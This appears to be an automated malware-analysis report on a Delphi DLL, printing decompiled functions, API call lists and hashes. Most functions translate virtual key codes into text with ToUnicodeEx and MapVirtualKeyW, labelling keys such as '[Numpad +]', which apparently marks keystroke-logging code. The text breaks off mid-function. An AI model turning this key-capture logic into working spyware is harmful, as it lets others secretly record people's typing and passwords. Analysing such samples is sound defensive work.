                  • Instruction ID: 44a22ba6fee8b4e9f78c922aeec61573fdb0a25af906651eec748b7687c73eda
                  • Opcode Fuzzy Hash: 1396860a42cb380e9acc2e04de6d3966a62f39ee4fc40e43a8010b9064b996bb
                  • Instruction Fuzzy Hash: A131C0B8B042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489724ECA78EE458761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 65%
                  			E1000280C() {
                  				void* _v8;
                  				char _v12;
                  				int _v16;
                  				signed short _t12;
                  				signed short _t14;
                  				intOrPtr _t27;
                  				void* _t29;
                  				void* _t31;
                  				intOrPtr _t32;
                  
                  				_t29 = _t31;
                  				_t32 = _t31 + 0xfffffff4;
                  				_v12 =  *0x1000e014 & 0x0000ffff;
                  				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                  					_t12 =  *0x1000e014; // 0x1332
                  					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                  					 *0x1000e014 = _t14;
                  					return _t14;
                  				} else {
                  					_push(_t29);
                  					_push(E1000287D);
                  					_push( *[fs:eax]);
                  					 *[fs:eax] = _t32;
                  					_v16 = 4;
                  					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                  					_pop(_t27);
                  					 *[fs:eax] = _t27;
                  					_push(0x10002884);
                  					return RegCloseKey(_v8);
                  				}
                  			}

                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 1000282E
                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,1000287D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 10002861
                  • RegCloseKey.ADVAPI32(?,10002884,00000000,?,00000004,00000000,1000287D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 10002877
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
• Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
• Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                  • API String ID: 3677997916-4173385793
                  • Opcode ID: 2de27d201efc82a7483fe1fc3ca906961f394501151e49489695f63c5642027c
                  • Instruction ID: 58881b6b02d8723bd0b6b44eaf0a35f8982818fe5ca11f09a28713a058d90beb
                  • Opcode Fuzzy Hash: 2de27d201efc82a7483fe1fc3ca906961f394501151e49489695f63c5642027c
                  • Instruction Fuzzy Hash: 7501F77D900249BAFB15DBA0CC42FE9B3BCEB08780F5040A1FB00E7598EB70AA50D765
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 67%
                  			E1000711C(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi, void* __eflags) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t130;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				0x76();
                  				asm("adc [esi-0x3befff8a], dh");
                  				if (__eflags <= 0) goto L1;
                  				asm("adc dl, dl");
                  				if (__eflags <= 0) goto L2;
                  				asm("adc al, ah");
                  				if (__eflags <= 0) goto L3;
                  				asm("adc [ebx+0x78ccbac3], cl");
                  				E100037AC(__ebx, L"[Numpad +]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t129 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t129);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t130 = _t56;
                  					if(_t130 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t130 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
• Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
• Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 470584828-3409537306
                  • Opcode ID: d00852749f0fa98736970e4bd149b739843efba6f4ddf0c6cc158de6b8264dba
                  • Instruction ID: 149ee91c77b329ac99fc9af66e0b3d6a30fb45bb34e994fec82f682e2bcf3d65
                  • Opcode Fuzzy Hash: d00852749f0fa98736970e4bd149b739843efba6f4ddf0c6cc158de6b8264dba
                  • Instruction Fuzzy Hash: B43123B8F042545BF722D7648C85B9F73A9FF892C0F10C096F5489724ECA78AE49CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100071AB(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, 0x10007980);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
• Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
• Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 783433895-3409537306
                  • Opcode ID: f7aef9f21616257945c88be8e333fc38432ac4e89a882b8b49a9e8d0194266b7
                  • Instruction ID: b9b3ae13005e08ec592b66eecad70d017cc54a4a4b75dc847ff917e2bac9dbd1
                  • Opcode Fuzzy Hash: f7aef9f21616257945c88be8e333fc38432ac4e89a882b8b49a9e8d0194266b7
                  • Instruction Fuzzy Hash: DF31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE49CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100071BC(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, 0x10007988);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
• Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
• Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 783433895-3409537306
                  • Opcode ID: 4ab29850c5f1ea5968f8bdd8de0f37538667ca36111ee2f0d472207cb48857ef
                  • Instruction ID: 3a51f266618fbb6b802821ae4c3cebfa16a004a881c451f646cc2ee8cf1695e6
                  • Opcode Fuzzy Hash: 4ab29850c5f1ea5968f8bdd8de0f37538667ca36111ee2f0d472207cb48857ef
                  • Instruction Fuzzy Hash: 1231C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100071CD(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, 0x10007990);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 783433895-3409537306
                  • Opcode ID: 60778e521d3828b1ac1843a7a9634b6a047fd589048255cd8357fb5c81321ec6
                  • Instruction ID: 6a83edecdd09e7cf6567bb4e12f854a4e7878076b54641c7a23d56263201f881
                  • Opcode Fuzzy Hash: 60778e521d3828b1ac1843a7a9634b6a047fd589048255cd8357fb5c81321ec6
                  • Instruction Fuzzy Hash: 6C31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100071DE(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, 0x10007998);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad
                  • API String ID: 783433895-3409537306
                  • Opcode ID: f4a8bbbe697522b7cb839a06d61e9bc714ef5e6879113a86d806209f1cea9cc7
                  • Instruction ID: b1ba141e3efd31ddec5efd417cab8458379c596905762369eb56fe309a4f9560
                  • Opcode Fuzzy Hash: f4a8bbbe697522b7cb839a06d61e9bc714ef5e6879113a86d806209f1cea9cc7
                  • Instruction Fuzzy Hash: CA31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100071EF(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, 0x100079a0);
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
